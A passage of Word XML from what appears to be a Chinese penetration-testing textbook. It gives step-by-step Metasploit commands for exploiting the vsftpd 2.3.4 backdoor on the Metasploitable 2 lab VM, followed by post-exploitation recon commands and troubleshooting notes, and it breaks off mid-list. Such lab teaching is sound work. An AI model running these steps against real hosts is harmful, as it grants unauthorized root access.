      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：搜索结果应显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块。若未显示该模块，可能由于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本更新后模块路径发生变化，可尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">search vsftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">search ftp backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扩大搜索范围。选中模块：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进入模块上下文后，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看必填参数：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主要必填参数为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3：配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，并查看该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块，默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/interact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Unix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准命令</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交互）。此</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell，功能较基础但足以完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> getshell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标。若希望获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话，需选择兼容的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">payload/cmd/unix/reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），但需事先确认目标环境是否支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4：执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认参数配置无误后执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 或使用 exploit 命令（二者等价）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象与判读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若目标存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门漏洞，exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行成功后应看到类似“Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell session X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">opened”的提示，表示已建立会话。随后将自动进入交互式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境，键入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看当前用户身份（Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门通常直接获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5：基础后渗透操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话后，执行基础信息收集命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查看当前用户身份</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查看系统基本信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-a</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/issue</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查看当前工作目录与文件列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-la</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 查看网络配置</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若需要返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的会话管理界面，按</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将会话置于后台（background）。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令查看所有活跃会话，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i &lt;ID&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新进入指定会话。这些会话管理操作已在第17.1节详述，此处直接使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行后长时间等待，最终显示“Exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> completed, but no session was created”。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可能原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：目标服务未运行在指定端口（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实际运行在非标准端口）；网络或主机防火墙阻止了反向连接（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达）；目标已修复该漏洞。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认目标端口服务指纹是否正确；在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping &lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查基本可达性；检查攻击机防火墙规则，确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口未被阻止。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1169"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
